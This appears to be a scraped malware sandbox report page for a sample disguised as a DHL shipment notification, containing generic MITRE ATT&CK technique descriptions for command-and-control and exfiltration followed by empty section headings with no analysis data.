Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage